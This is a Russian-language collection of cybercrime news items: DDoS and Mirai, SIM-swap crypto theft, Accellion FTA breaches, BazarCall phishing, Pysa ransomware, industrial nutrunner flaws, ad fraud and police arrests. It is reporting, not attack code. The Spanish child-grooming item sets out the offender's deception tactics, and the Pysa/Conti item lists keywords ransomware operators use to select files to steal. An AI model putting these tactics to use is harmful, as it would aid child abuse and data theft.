Хатчинс и Бомон активно расследовали использование хакером ботнета Mirai. Кэйи отвечал DDoS-атаками на ресурсы исследователей. В частности, на личный сайт Хатчинса была направлена атака интенсивностью в 1 терабайт в секунду, что лишь немного отличалось от самой мощной в истории атаки подобного рода в 1,2 терабайта в секунду.
«Эксперты по безопасности называют самого Кэйи “прямой угрозой”, а не только его деятельность, и это достаточно символично, — считает Алексей Водясов, технический директор компании SEQ. — При этом, судя по всему, он преимущественно полагался на чужие средства и разработки, не создавая почти ничего самостоятельно, если не считать закрытого маркета. И вряд ли что-то помешает ему вернуться к прежней деятельности после освобождения из тюрьм, хотя срок он, скорее всего, получит довольно продолжительный».
В заключении суда указывается, что обвинения против Кэйи изначально были выдвинуты еще в апреле 2021 г. На тот момент Кэйи находился за пределами США. В сентябре 2022 г. он «дал согласие» на экстрадицию с Кипра в США, где в конце октября и состоялось личное предъявление обвинений подсудимому.
Сотрудники правоохранительных органов Канады арестовали подростка по подозрению в похищении криптовалюты на сумму порядка $36,5 млн у одного- единственного человека в США. Полиция города Гамильтон (Онтарио, Канада) назвала инцидент крупнейшей в истории кражей криптовалюты у одного человека.
Пострадавший стал жертвой так называемого SIM-свопинга - злоумышленник получил доступ к его номеру телефона и перехватил коды для двухфакторной аутентификации, благодаря чему ему удалось получить контроль над защищенным кошельком.
Вор потратил некоторые похищенные деньги на покупку редких имен пользователя в online-играх, что и вывело на него Управление полиции Гамильтона, ФБР и Рабочую группу по вопросам электронных преступлений Секретной службы США. После ареста подростка правоохранители изъяли у него порядка $5,5 млн в похищенной криптовалюте.
2021 год стал знаменательным годом в плане кражи криптовалюты. В июне инвесторы в ЮАР потеряли $3,6 млрд в биткойнах после исчезновения учредителей крупнейшей в стране криптовалютной биржи. В тот же месяц полиция в Великобритании изъяла порядка $158 млн в различных криптовалютах. На то время это было крупнейшим арестом имущества подобного рода в истории страны.
• Source: <https://hamiltonpolice.on.ca/news/arrest-made-in-46-million-dollar- cryptocurrency--theft/>
Он называл себя "Алисия, ваш работодатель".
Жандармерия Испании (La Guardia Civil — Гражданская гвардия) в рамках операции с условным названием «Бискотту» («Biscottu») арестовала в Мурсии кибернетического сексуального хищника, который обманом заставлял девочек отправлять ему детские порнографические материалы. 22-летний мужчина находится под следствием как исполнитель преступлений, связанных с демонстрацией порнографических материалов несовершеннолетним, сексуальным посягательством на несовершеннолетнюю в возрасте до 16 лет с доступом к телу, а также вербовкой и использованием несовершеннолетних для изготовления порнографических материалов.
Задержанный выдавал себя за девочку аналогичного возраста и сумел войти в доверие к несовершеннолетним, чтобы впоследствии общаться с ними через приложение для обмена сообщениями «Zangi». Там он убеждал их отправлять ему материалы сексуального содержания в обмен на виртуальную валюту.
Этот обман позволил ему получить незаконные материалы от девочек, которые не знали о сексуальном характере того, что «подружки» просили. Как только видео оказывались в его распоряжении, он обрабатывал и редактировал их, чтобы затем обменивать на другие в закрытых педофильских группах, расположенных в теневом интернете.
Расследование началось в ноябре 2023 года после жалобы, поданной в отдел судебной полиции Гражданской гвардии в Логроньо-Ла-Риоха родителями двух 9-летних несовершеннолетних. В своем заявлении они указали, что после проверки компьютерного оборудования, которым пользовались их дочери, они обнаружили, что несовершеннолетние отправляли изображения и видеофайлы неизвестному лицу, обнажаясь и совершая интимные прикосновения. В связи со сложившейся ситуацией за расследование взялись сотрудники группы по делам женщин и несовершеннолетних EMUME Гражданской гвардии Ла-Риохи.
Проанализировав электронные устройства девочек, следователи выяснили, что имеют дело со случаем сексуального домогательства к несовершеннолетним через Интернет, известным как «секстинг» («sexting»), которое совершил педофил, владеющий компьютерными навыками, чтобы скрыть свою преступную деятельность и избежать разоблачения.
Киберхищник, который на одной из игровых онлайн-платформ фигурировал под псевдонимом «Куки», устанавливал долгосрочные отношения с девочками путем обмана и злоупотребления превосходством в жизненном опыте. Обманув их и завоевав доверие, он убедил их установить приложение «Zangi», чтобы общаться с ними более конфиденциально, называя себя «Алисия, ваш работодатель».
Таким образом он заставил девочек воспринимать его просьбы присылать ему секс- видео как нечто нормальное. Для этого он отправлял им 108 видео с детской порнографией, инструктируя их имитировать те же позы, в обмен на виртуальную валюту для видеоигр. В зависимости от количества видео, продолжительности и запрашиваемых аберрантных поз он платил им от 80 до 1 000 виртуальных монет.
По ходу расследования жандармам удалось установить, что он скрывается в Мурсии, поэтому они отправились в вышеупомянутый город, чтобы провести его арест и обыск двух домов, где изъяли более 2 терабайт информации, хранящейся в облаке и на различных компьютерных носителях, таких как жесткие диски, флешки, карты памяти, емкость которых может вмещать более 400 000 файлов такого типа.
300 видеороликов с несовершеннолетними
Первые проведенные анализы позволили безошибочно установить, что именно этот человек общался с жертвами из Ла-Риохи. На данный момент, кроме того, было найдено еще 300 видеороликов с детской порнографией, в которых фигурируют маленькие мальчики и девочки, что послужило поводом полную идентификацию фигуранта.
Суд Мурсии № 6 постановил заключить задержанного под стражу без права внесения залога.
Операция была проведена группой по работе с женщинами и несовершеннолетними EMUME Гражданской гвардии Ла-Риохи и Следственным судом № 2 Логроньо.
В операции участвовал персонал групп по борьбе с технологическими преступлениями Логроньо и Мурсии, IT-отдела Службы уголовного розыска Мадрида, центрального отдела EMUME технического подразделения судебной полиции Мадрида и сотрудники USECIC командования Мурсии.
Microsoft устраняет критические уязвимости в Patch Tuesday
Microsoft выпустила обновления
безопасности, устраняющие 79 уязвимостей в рамках сентябрьского Patch Tuesday
2024. Среди них обнаружено четыре уязвимости нулевого дня, которые уже активно
эксплуатируются злоумышленниками.
🛡 Обновление включает исправления для семи критических уязвимостей, связанных с удаленным выполнением кода и повышением привилегий. Особое внимание уделено устранению 30 уязвимостей повышения привилегий и 23 уязвимостей удаленного выполнения кода.
Среди исправленных zero-day уязвимостей — проблемы в Windows Installer, обход
функции безопасности Mark of the Web, уязвимость в Microsoft Publisher и
ошибка в центре обновления Windows. Пользователям настоятельно рекомендуется
установить все доступные обновления.
#PatchTuesday #Windows #ZeroDay
Россиянин пытался обмануть ЦБ Дании на $3,5 млрд. Мужчина приговорен к трем годам лишения свободы.
Городской суд Копенгагена в среду, 16 августа, приговорил к трем годам лишения свободы и депортации гражданина России, который пытался заставить ЦБ Дании перевести ему более $3 млрд.
Приговор вынесен по делу о покушении на мошенничество при отягчающих обстоятельствах и подделке документов. Обвиняемым оказался 53-летний гражданин России, имя которого не уточняется.
По данным полиции, в октябре 2022 года мужчина отправил несколько электронных писем в Danmarks Nationalbank (ЦБ Дании), а также лично явился туда. Он выдавал себя за представителя инвестиционной компании и, используя поддельные документы, пытался добиться от банка выплаты или перевода $3,5 млрд (почти 26 млрд датских крон). Мужчина был арестован 21 октября 2022 года и находился под арестом вплоть до вынесения приговора.
Прокурор назвал это дело «необычным» и сообщил, что ЦБ Дании быстро заподозрил россиянина в мошенничестве и обратился в полицию, говорится в сообщении полиции Дании.
source:
bloomberg.com/news/articles/2023-08-16/russian-man-sentenced-to-prison-
as-3-5-billion-danish-central-bank-scam-fails#xj4y7vzkg
politi.dk/koebenhavns-politi/nyhedsliste/tre-aars-faengsel-for-forsoeg-paa-
milliardbedrageri/2023/08/16
Евгению Котикову также назначили денежный штраф в размере 800 000 руб.
В Ростове осудили IT-специалиста Евгения Котикова за помощь Украине в DDoS- атаках на информационные ресурсы министерства обороны РФ и сайт президента РФ, сообщает пресс-служба регионального УФСБ.
"Сотрудниками УФСБ России по Ростовской области задокументирована и пресечена преступная деятельность IT-специалиста, причастного к организованной украинской стороной компьютерной DDoS-атаке на информационные системы субъектов критической информационной инфраструктуры Российской Федерации", - говорится в сообщении.
Уточняется, что Евгений Котиков начал свою преступную деятельность в феврале 2022 года. Он выступал сторонником киевского режима и решил участвовать в блокировке информационных ресурсов Министерства обороны РФ и сайта президента Российской Федерации.
Ростовский областной суд признал его виновным в «неправомерном воздействии на критическую информационную инфраструктуру Российской Федерации», согласно уголовное статье 274.1 УК РФ.
Программиста приговорили к трём годам лишения свободы в колонии-поселении и оштрафовали на 800 000 рублей в пользу государства.
Компьютер, использованный Котиковым в совершении преступления, был конфискован в пользу государства, сообщили в ФСБ.
Постановление суда вступило в законную силу.
В прошлом году восемь человек открыли ООО "Союз Эксперт", ООО "Гранд-Групп" и ООО "Никель Консалт".
Они представлялись брокерами и предлагали заработать на крипте, однако, денег никто из клиентов не увидел.
По данным прокуратуры, они развели минимум 43 человека. Сначала им предлагали работу в интернете, а потом учили играть на бирже через специальную программу.
Только вот «биржа» была липовая, а вот деньги, которые сливали в неё люди
настоящие.
Разводил поймали в Уфе, все задержаны, возбуждено дело о мошенничестве.
Криптовалютная биржа Rain.com в Бахрейне подверглась хакерской атаке в апреле, потеряв $16 миллионов. Расследование установило, что за атакой стоит северокорейская группа Lazarus, которая использовала социальную инженерию через LinkedIn.
Согласно данным, злоумышленники получили доступ к внутренним системам Rain, выдавая себя за рекрутеров. Они связались с одним из сотрудников через LinkedIn, предложив вакансию, и направили ссылку на выполнение тестового задания. В файле содержалась вредоносная программа TraderTraitor, которая позволила хакерам получить доступ к приватным ключам и паролям для управления криптовалютными кошельками.
Сотрудники ФБР совместно с Rain отследили часть похищенных средств, обнаружив $760 тысяч в криптовалюте SOL на бирже WhiteBIT, расположенной в Вильнюсе, Литва. Эти средства заморожены в ожидании их конфискации.
Lazarus Group не впервые применяет подобные методы, используя платформу LinkedIn. Согласно материалам ордера, хакеры создают поддельные профили, представляясь рекрутерами известных компаний. После установления контакта с жертвой общение переносится на платформы WhatsApp, Telegram или Slack, где распространяется вредоносное ПО для кражи паролей.
По данным Министерства юстиции США, с 2017 по 2024 год Lazarus Group провела многочисленные хищения виртуальной валюты, получив сотни миллионов долларов. Ранее сообщалось, что украденные средства используются для финансирования ядерной программы Северной Кореи.
Биржа Rain пока не дала официальных комментариев.
Сотрудники УБК МВД России совместно с московскими коллегами задержали подозреваемого в хищениях сбережений граждан с использованием криптоматов.
«Предварительно установлено, что злоумышленники установили более 20 криптоматов в нескольких регионах Российской Федерации. Потерпевшие, попав под влияние телефонных мошенников, вносили в терминалы свои денежные средства и таким образом переводили их на криптокошельки организаторов криминальной схемы. Лидер группировки, уроженец Украины, позднее забирал из криптоматов внесенные гражданами наличные. Затем приносил их в обменный пункт, где ему зачисляли криптовалюту на эквивалентную сумму. Ее он переводил своим кураторам из Украины, оставляя себе в качестве заработка процент с транзакции», – рассказала официальный представитель МВД России Ирина Волк.
В числе пострадавших – участник СВО, который находился в Москве на реабилитации после полученного ранения. Следуя указаниям незнакомцев, он перевел более 2,5 миллиона рублей на так называемые безопасные счета. Предположительно, от действий аферистов пострадали свыше 150 человек.
«В ходе оперативно-розыскных мероприятий полицейские задержали подозреваемых в Москве. В ходе обысков у организатора на одном из компьютеров обнаружена консоль администратора, с которой управлялись криптоматы. Оперативники УБК МВД России приняли меры для централизованной блокировки функционирующей сети. Изъяты терминалы, находившиеся в Москве, крупные суммы, мобильные телефоны и другие предметы, имеющие доказательственное значение.
Следователем СУ УВД по САО ГУ МВД России по г. Москве расследуется уголовное дело по признакам преступления, предусмотренного частью 4 статьи 159 УК РФ. Один фигурант заключен под стражу, остальным избрана мера принуждения в виде обязательства о явке.
В настоящее время сотрудники полиции проводят мероприятия, направленные на установление всех обстоятельств противоправной деятельности», – сообщила Ирина Волк.
• Video: https://rutube.ru/video/c2da87e8887518e73c3e8fd2be6ff535/?r=plemwd
Лондонский суд приговорил 42-летнюю Вэнь Цзянь почти к семи годам лишения свободы за мошенничество в особо крупных размерах. По версии следствия, Вэнь была участницей схемы по отмыванию $6,4 млрд, обманом полученных от китайских инвесторов. Женщтна помогала конвертировать средства сначала в биткойны, а потом обратно в доллары.
Обманная схема действовала в Китае в 2014–2017 годах. Когда китайские власти начали расследование, организаторы скрылись в Великобритании. Чтобы вывезти из Китая похищенные средства, преступники перевели их в криптовалюту, и чтобы ускорить процесс, привлекли нескольких человек, в том числе и Вэнь, работавшую тогда в дешевых китайских закусочных. Всего преступники смогли купить 61 тыс. биткойнов.
Как заявила женщина на суде, она не знала, что деньги имеют криминальное происхождение, она «просто нажимала кнопки в компьютере» и делала то, что ей говорили. А деньги ей были нужны, чтобы «обеспечить более хорошую жизнь себе и сыну». На этой схеме Вэнь неплохо заработала. Она снимала за £17 тыс. в месяц дом с шестью спальнями, путешествовала по миру, тратила десятки тысяч долларов на дизайнерскую одежду и обувь в универмаге Harrods. Женщина приобрела Mercedes E за £25 тыс. и оплачивала учебу сына в дорогой подготовительной школе, где один семестр стоит £6 тыс.
В поле зрения британских правоохранительных органов женщина попала, после того как попыталась купить несколько очень дорогих объектов недвижимости в Великобритании. В их числе был особняк с семью спальнями и бассейном в Хэмпстеде стоимостью £23,5 млн, а также соседний с ним дом стоимостью £12,5 млн с кинотеатром и спортзалом. Однако сделки так и не были реализованы, так как женщина не смогла объяснить происхождение своих денег.
Вэнь задержали в начале 2022 года. Суд признал ее виновной по одному из трех пунктов обвинения — отмывание денег, ее вина в мошенничестве с кражей средств инвесторов не была доказана. Адвокат Вэнь Цзянь намерен опротестовать решение суда. Свою подзащитную он называет еще одной жертвой «профессиональных криминальных суперзлодеев», которые «использовали ее и бросили».
reuters.com/world/uk/woman-jailed-laundering-bitcoin-uk-64-bln-china- fraud-2024-05-24/
Аналитики компании FireEye предупреждают, что с декабря 2020 года по январь 2021 года около 100 компаний и организаций по всему миру, использующих файлообменный сервис Accellion FTA (File Transfer Application), подверглись взлому. Эксперты связывают эту активность с хакерской группой FIN11.
Согласно отчету, для атак хакеры применяли четыре уязвимости в FTA (CVE-2021-27101, CVE-2021-27102, CVE-2021-27103 CVE-2021-27104), устанавливали веб-шелл DEWMODE, а затем использовали его для кражи файлов, хранящихся на FTA-устройствах жертв.
Проблема заключается в том, что Accellion FTA — это легаси-сервис, который разворачивают локально для обмена большими файлами, которые нельзя передать по электронной почте. В начале 2000-х, когда появился FTA, еще не были доступны Dropbox, Google Drive и другие похожие решения.
В одном из первых заявлений компании Accellion говорилось, что еще в середине декабря 2020 года разработчикам стало известно об критической уязвимости в FTA, и в течение следующих 72 часов среди клиентов, использующих FTA, был распространен патч.
В итоге разработчики Accellion выпустили несколько «волн» исправлений, но каждый раз подчеркивали, что FTA уже давно является устаревшим продуктом, и призывали своих клиентов перейти на новую платформу Kiteworks. А в текущем месяце в компании и вовсе заявили, что окончательно прекратят поддержку FTA 30 апреля 2021 года.
По собственным данным представителей компании Accellion, из примерно 300 клиентов FTA жертвами атак стали «менее 100», а среди них менее 25 пострадали от кражи данных. В FireEye уточняют, что некоторые из этих 25 клиентов подвергаются шантажу, и хакеры требуют у них выкуп. Злоумышленники связываются со своими жертвами по электронной почте и требуют выкуп в биткоинах, а в противном случае угрожают опубликовать украденную информацию на сайте шифровальщика Clop.
[](https://xakep.ru/wp- content/uploads/2021/02/340654/fin11-extortion-notes.png)
Вымогательское послание
Интересный факт: несмотря на то, что данные жертв публикуются на сайте Clop, у пострадавших компаний не было зашифровано ни одного сегмента внутренних сетей. То есть они стали жертвами классического вымогательства, а не шифровальщика.
Аналитики FireEye разделяют эти атаки на два разных кластера активности, которые в компании отслеживают как UNC2546 (эксплуатация уязвимостей нулевого дня на устройствах FTA) и UNC2582 (рассылка вымогательских электронных писем). При этом, как сообщается теперь, инфраструктура обеих группировок пересекается с крупной хак-группой FIN11, которую FireEye обнаружила в прошлом году.
Еще до выхода отчета FireEye исследователи Risky Business обнаружили данные пострадавших компаний на сайте операторов Clop. Так, хакеры уже опубликовали информацию следующих жертв:
Также о компрометации своих систем из-за взлома Accellion FTA сообщали и друге компании и организации, хотя их данные не появлялись на сайте хакеров. В их числе:
Источник: xakep.ru/2021/02/24/accellion-fin11/
Министерство юстиции США объявило, что 24-летняя Микара Дестини Робинсон (Mykara Destiny Robinson) признала себя виновной в банковском мошенничестве. Таким образом, как сообщает KGET, она стала последним, тринадцатым, членом группировки, который предстанет перед судом по обвинению в незаконном получении пособий по безработице от государства. Все они — жители Калифорнии, работали в своем же штате.
Суммарно члены сообщества создали около 150 поддельных учетных записей в Департаменте занятости Калифорнии, что позволило им получить 993 тысячи долларов. Руководили группировкой две женщины — 38-летняя Натали Ле Димола (Natalie Le Demola) и 33-летняя Карлейша Неоша Пламмер (Carleisha Neosha Plumme). Именно они стали инициаторами покупки персональных данных людей, от имени которых подавались заявки на выплату пособий. Большая их часть отбывает наказание в исправительных учреждениях штата, некоторые оказались пенсионерами.
После одобрения поддельных заявок и получения дебетовых карт с пособиями деньги снимались в банкоматах по всей Южной Калифорнии. Первые мошенничества датированы июнем 2020 года.
Издание отмечает, что Робинсон, как и большинству других членов группировки, грозит до 30 лет лишения свободы по обвинениям в заговоре и банковском мошенничестве, а также краже персональных данных, Пламмер и Димола могут отправиться в тюрьму на 32 года.
source: kget.com/news/state-news/california-residents-face-years-in-federal- prison-after-pleading-guilty-to-stealing-prison-inmates-identities
Группы сосредоточены на атаках крупных компаний с использованием социальной инженерии.
Согласно новому отчету экспертов Advanced Intelligence , группировки Silent Ransom Group ( Luna Moth ), Quantum и Roy/Zeon, которые ранее входили в синдикат Conti, стали проводить фишинговые атаки BazarCall (BazaCall) в качестве основного метода получения начального доступа к сети жертвы. Это позволяет злоумышленникам проводить целенаправленные атаки, которые труднее обнаружить и остановить из-за использования социальной инженерии.
Переход к социальной инженерии был вызван предсказуемостью обычных атак, что привело к снижению прибыли, поскольку специалисты по кибербезопасности начали применять эффективные меры по смягчению последствий.
«Мы не можем выиграть войну технологий, потому что на этой арене мы конкурируем с компаниями-миллиардерами, но мы можем победить человеческий фактор» - сказали Conti
Во всех трех фишинговых кампаниях хакеры выдавали себя за известные кампании,
такие как Duolingo, MasterClass, Oracle, CrowdStrike, iWired, Applied
Automation Tech, Itarian и другие.
Кроме того, жертвами групп являются крупные компании с высокими доходами, в
том числе:
Три группы, использующие тактику BazarCall для взлома компаний, показали, что вымогательство или простая кража данных в сочетании с сетевым шифрованием все еще может быть прибыльными способами атак. Упомянутые кампании BazarCall в течение 3 месяцев привели к 20 обращениям жертв и требованиям выкупа на десятки миллионов долларов.
Хотя обнаружение первоначального заражения может быть затруднено, защитники могут отслеживать необычные сигналы связи с C2-сервером и установленные на машинах маяки, которые указывают на заражение. Кроме того, AdvIntel рекомендует контролировать сеть на предмет возможных боковых перемещений, которые могут повлиять на контроллер домена.
source: advintel.io/post/bazarcall-advisory-the-essential-guide-to-call-back- phishing-attacks-that-revolutionized-the-data
**Китайские исследователи безопасности завоевали в общей сложности $1,88 млн на главных в стране хакерских соревнованиях "Кубок Тяньфу" (Tianfu Cup), взломав самое популярное в мире ПО, в том числе Windows 10, iOS 15, Ubuntu, Chrome и пр.
Гран-при соревнований, проходивших 16-17 октября в городе Чэнду, завоевали специалисты китайской ИБ-компании Kunlun Lab, повезшие домой $654,5 тыс., что составляет треть от всего призового фонда.
Большинство обнаруженных участниками уязвимостей представляют собой повышение привилегий или удаленное выполнение кода, но два эксплоита заслуживают особого внимания.
Первый эксплоит позволяет осуществить цепочку атак на последний iPhone 13 под управлением iOS 15 со всеми существующими на сегодняшний день обновлениями. С помощью второго можно в два этапа удаленно выполнить код на Google Chrome, чего уже много лет не удавалось достигнуть участникам хакерских соревнований.
Источник**
Исследователи в области кибербезопасности из компании Wiz обнаружили новый класс уязвимостей в DNS, затрагивающих основных поставщиков DNS-as-a-Service (DNSaaS). Эксплуатация уязвимостей позволяет злоумышленникам получить доступ к конфиденциальной информации в корпоративных сетях.
Специалисты продемонстрировали свои находки на конференции Black Hat. По словам экспертов, проблемы предоставляют злоумышленникам возможности для сбора разведданных на глобальном уровне с помощью простой регистрации домена.
Как объяснили исследователи, процесс эксплуатации довольно прост — они зарегистрировали домен и использовали его для взлома DNS-сервера провайдера DNSaaS (в их случае Amazon Route 53), что позволило им прослушивать динамический поток DNS-трафика из сетей клиентов Route 53.
«Динамический DNS-трафик, к которому мы получили доступ, исходил от более чем 15 тыс. организаций, включая компании из списка Fortune 500, 45 правительственных агентств США и 85 международных правительственных агентств», — сообщили эксперты.
Собираемые данные включали имена сотрудников, названия компьютеров и их местоположения, а также конфиденциальные сведения об инфраструктуре организации, в том числе доступные в Сети сетевые устройства. В одном случае исследователи нанесли на карту расположение офисов одной из крупнейших в мире сервисных компаний, используя сетевой трафик от 40 тыс. корпоративных конечных точек.
Подобная информация может значительно упростить работу злоумышленникам по проникновению в сеть организации и дальнейшему шпионажу.
Исследователи не нашли свидетельств того, что обнаруженная ими уязвимость DNS ранее использовалась в реальных атаках. Однако, любой хакер, знающий о данных проблемах, «мог собирать данные и оставаться незамеченным в течение более десяти лет», отметили эксперты. Кроме того, хотя два основных поставщика DNS (Google и Amazon) уже исправили эти уязвимости, другие, вероятно, все еще уязвимы, подвергая риску атак миллионы устройств.
• Source: [https://www.wiz.io/blog/black-hat-2...-level-spying-as-easy-as- registering-a-domain](https://www.wiz.io/blog/black-hat-2021-dns-loophole- makes-nation-state-level-spying-as-easy-as-registering-a-domain)
• Source: [https://www.blackhat.com/us-21/brie...affecting-many-dns-as- service- platforms-23563](https://www.blackhat.com/us-21/briefings/schedule/#a-new- class-of-dns-vulnerabilities-affecting-many-dns-as-service-platforms-23563)
Как мы уже рассказывали ранее, с декабря 2020 года ИБ-эксперты фиксируют атаки на компании и организаций, использующие устаревший файлообменный сервис Accellion FTA (File Transfer Application). Аналитики FireEye связывают эту активность с хакерской группой FIN11 и предупреждают, что жертвами злоумышленников уже стали более 100 компаний.
Согласно последним данным, хакеры эксплуатируют четыре уязвимости в FTA (CVE-2021-27101, CVE-2021-27102, CVE-2021-27103 CVE-2021-27104), а затем устанавливают веб-шелл DEWMODE и используют его для кражи файлов, хранящихся на FTA-устройствах жертв. После этого злоумышленники шантажируют пострадавших, требуя выкуп и угрожая слить похищенную информацию в открытый доступ.
Интересно, что похищенные данные публикуются на сайте, который принадлежит операторам шифровальщика Clop, однако в сетях пострадавших компаний не было зашифровано ни одной машины. То есть все они стали жертвами взлома и классического вымогательства, а не атаки шифровальщика.
По информации Accellion, из примерно 300 клиентов FTA жертвами атак стали «менее 100», а среди них менее 25 пострадали от кражи данных. В FireEye уточняют, что некоторые из этих 25 клиентов подвергаются шантажу, и хакеры требуют у них выкуп.
Ранее на этой неделе стало известно, что очередной жертвой этой кампании стала канадская машиностроительная компания Bombardier, чьи данные уже опубликованы на сайте Clop.
«Расследование показало, что неавторизованные лица получили доступ и похитили данные, воспользовавшись уязвимостью, затрагивающей стороннее приложение для передачи файлов, которое работало на специальных серверах, изолированных от основной сети Bombardier», — гласит официальное заявление производителя.
Click to expand...
В компании также сообщили, что была скомпрометирована личная и другая конфиденциальная информация, касающаяся сотрудников, клиентов и поставщиков Bombardier: пострадали как минимум около 130 сотрудников в Коста-Рике.
Хуже того, СМИ уже нашли среди опубликованных хакерами данных различную проектную документацию для самолетов и авиадеталей производства Bombardier. К примеру, журналистам британского издания The Register удалось опознать на одном из утекших CAD-чертежей военную радиолокационную систему Leonardo Seaspray 7500E, произведенную военным подрядчиком Leonardo. Эта РЛС устанавливается на разведывательные самолеты GlobalEye на базе Global-6000, которые поставляются в Объединенные Арабские Эмираты, а также на самолеты C-130 Hercules, которые использует береговая охрана США.
Источник: xakep.ru/2021/02/25/bombardier-leak/
Сотрудники уголовного розыска УМВД России по г.о. Королёв ГУ МВД России по Московской области в результате оперативно-розыскных мероприятий по подозрению в пособничестве дистанционным аферистам задержали жителей Сибирского Федерального округа – молодого человека и девушку в возрасте 19 лет.
Задержанию фигурантов предшествовало совершение мошенничества в отношении 68-летнего местного жителя. Мужчине позвонили неизвестные, которые представились сотрудниками правоохранительных органов и службы безопасности банка и сообщили, что некие злоумышленники пытаются оформить на него кредит. Для предотвращения противоправных действий собеседники рекомендовали пенсионеру обналичить свои сбережения, а также оформить два займа в разных банках и перевести всю сумму на якобы безопасные счета. Таким образом потерпевший лишился более 6 миллионов рублей.
В результате проведённых мероприятий полицейские выяснили, что обманутый гражданин перевёл часть денег через мобильное приложение на счёт, принадлежащий 19-летней жительнице Красноярского края. В ходе выезда в служебную командировку оперативники установили, что девушка оформила банковскую карту по просьбе своего друга детства – жителя Республики Хакасия. Оба молодых человека были задержаны и доставлены в Московскую область.
Юноша пояснил, что нашёл работу в сети Интернет. В его обязанности входил поиск людей, готовых оформлять и продавать банковские карты, которые в дальнейшем использовались для вывода похищенных денежных средств. За каждую новую карту он получал по 10 тысяч рублей от неустановленных работодателей.
Следователем Следственного управления УМВД России по г.о. Королёв возбуждено уголовное дело по признакам преступления, предусмотренного ч. 4 ст. 159 Уголовного кодекса Российской Федерации. Судом девушке избрана мера пресечения в виде запрета определённых действий, молодому человеку – заключение под стражу.
В настоящее время проводятся дополнительные мероприятия, направленные на установление соучастников преступления, а также причастности задержанных к аналогичным эпизодам противоправной деятельности.
В распоряжении исследователей оказался PowerShell-скрипт, используемый операторами вымогателя Pysa, и эксперты смогли оценить, какие типы данных хакеры пытаются похитить во время атак.
Обычно операторы вымогателей проникают в целевую сеть и начинают с ограниченного доступа к одному устройству. Затем они используют различные инструменты и эксплоиты для кражи других учетных данных, используемых в домене Windows, или получения повышенных привилегий. Получив доступ к контроллеру домена Windows, они ищут и воруют различную информацию из сети жертвы, перед тем как зашифровать устройства.
Журналисты Bleeping Computer пишут, что на днях специалисты MalwareHunterTeam поделились с ними скриптом, который операторы вымогателя Pysa используют для поиска и хищения данных с атакованного сервера.
Скрипт разработан для сканирования каждого диска в поисках папок с данными, имена которых соответствуют определенным строкам. Если папка соответствует критериям поиска, скрипт загрузит файлы на удаленный сервер, находящийся под управлением злоумышленников.
Особый интерес для исследователей представляли 123 ключевых слова, на которые ориентируется скрипт в своих поисках, и которые дают представление о том, что хакеры считают ценным. Как и следовало ожидать, скрипт ищет файлы, связанные с финансовой или личной информацией компании, включая данные аудитов и банковскую информацию, учетные данные, налоговые формы, номера социального страхования и документы SEC. Также он ищет и другие ключевые слова, включая crime (преступление), investigation (расследование), fraud (мошенничество), bureau (бюро), federal (федеральное), hidden (скрытое), secret (секрет), illegal (нелегальное), terror (террор). Полный список можно увидеть ниже.
Издание напоминает, что недавно свет на работу другого шифровальщика, Conti, пролил недовольный партнер группировки. Согласно опубликованным им данным, после получения контроля над контроллером домена Windows партнерам группировки предлагалось искать следующие ключевые слова:
Cyber;
Policy;
Insurance;
Endorsement;
Supplementary;
Underwriting;
Terms;
Bank;
2020;
2021;
Statement.Click to expand...
• Source: https://www.bleepingcomputer[.]com/...-script-shows-exactly-the- files-theyre-after/
У задержанных изъято 26,7 миллиона евро наличными, 230 килограммов наркотиков и 45 единиц оружия.
Международную спецоперацию против продавцов и покупателей на подпольных рынках в даркнете провел Европол, [сообщает](https://www.dw.com/en/europol- investigation-busts-150-high-value-darknet-vendors/a-59625287?maca=en-GK- Inoreader-NewsPolitics-21641-xml-media) портал Deutsche Welle.
По подозрению в торговле незаконными товарами в даркнете по всему миру арестовали 150 человек, у них изъято 26,7 миллиона евро наличными, 230 килограммов наркотиков и 45 единиц оружия. Среди конфискованных наркотических веществ находились в том числе 152 кг амфетаминов, 27 кг опиатов и более 25 тыс. таблеток синтетического наркотика «Ecstasy».
Большая часть задержанных — граждане США (65 человек), Германии (47) и Соединенного Королевства (24). Также в списке есть подданные Нидерландов (4), граждане Франции (3), двое человек из Швейцарии и один болгарин. Почти все были крупными продавцами на площадке **********, которую Европол раскрыл ранее в этом году.
На текущий момент в ряде стран Европы продолжаются следственные мероприятия. В каких именно, представитель Европола не сообщил.
Подробнее: https://www.securitylab.ru/news/525993.php
Эксперты компании
[Nozomi](https://www.nozominetworks.com/blog/vulnerabilities-on-bosch-rexroth-
nutrunners) выявили более двух десятков уязвимостей в популярной серии
промышленных подключаемых к сети гайковертов, которые используются на заводах
и фабриках по всему миру (особенно на автомобильных производствах).
Уязвимости были обнаружены в гайковерте/пневматическом динамометрическом ключе модели [Bosch Rexroth NXA015S-36V-B](https://store.boschrexroth.com/HANDHELD- NUTRUNNER_0608842006?cclcl=en_IN). Эти беспроводный устройства подключаются к локальной сети организаций по Wi-Fi и на них можно удаленно регулировать крутящий момент с высокой точностью, что может быть крайне важно для безопасности и надежности различных изделий.
Исследователи описывают два возможных сценария атак на устройства Bosch
Rexroth.
Первый сценарий, это вымогательская атака. Во время тестов экспертам удалось
полностью вывести устройство из строя, отключить кнопку запуска и вывести на
дисплей сообщение с требованием выкупа. Отмечается, что легкость, с которой
такую атаку, можно автоматизировать, распространив ее на большое число
устройств, позволяет злоумышленникам быстро отключить инструменты на всей
производственной линии, что потенциально может привести к серьезным сбоям или
полной остановке целого производства, что гарантирует масштабные финансовые
потери для компании.
Второй сценарий атаки подразумевает незаметное вмешательство в настройки гайковерта. К примеру, исследователи сумели увеличить или уменьшить крутящий момент, при этом «подправив» данные на встроенном дисплее таким образом, чтобы оператор устройства видел нормальное значение и даже не подозревал о внесенных потенциальными злоумышленниками изменениях. Такая атака может привести к изготовлению дефектной продукции, что в итоге тоже повлечет за собой финансовый или репутационный ущерб для компании.
(с) - репост с xakep.ru
Мошенническая кампания Vastflux продемонстрировала, как изобретательны могут быть злоумышленники.
Масштабная мошенническая кампания, получившая название «Vastflux», недавно была полностью остановлена исследователями безопасности из подразделения Satori, компании HUMAN. В рамках кампании киберпреступники подделали более 1700 приложений от 120 издателей, в основном для iOS.
Данному способу мошенничества дали название «Vastflux» из-за используемого шаблона показа видеорекламы «VAST» и метода уклонения «fast flux», необходимого для сокрытия вредоносного кода путем быстрого изменения большого количества IP-адресов и записей DNS, связанных с одним доменом.
Согласно отчету HUMAN, Vastflux генерировал более 12 миллиардов запросов в день на пике своего распространения и затронул около 11 миллионов устройств, многие из которых находятся в экосистеме Apple iOS.
Подробнее о Vastflux
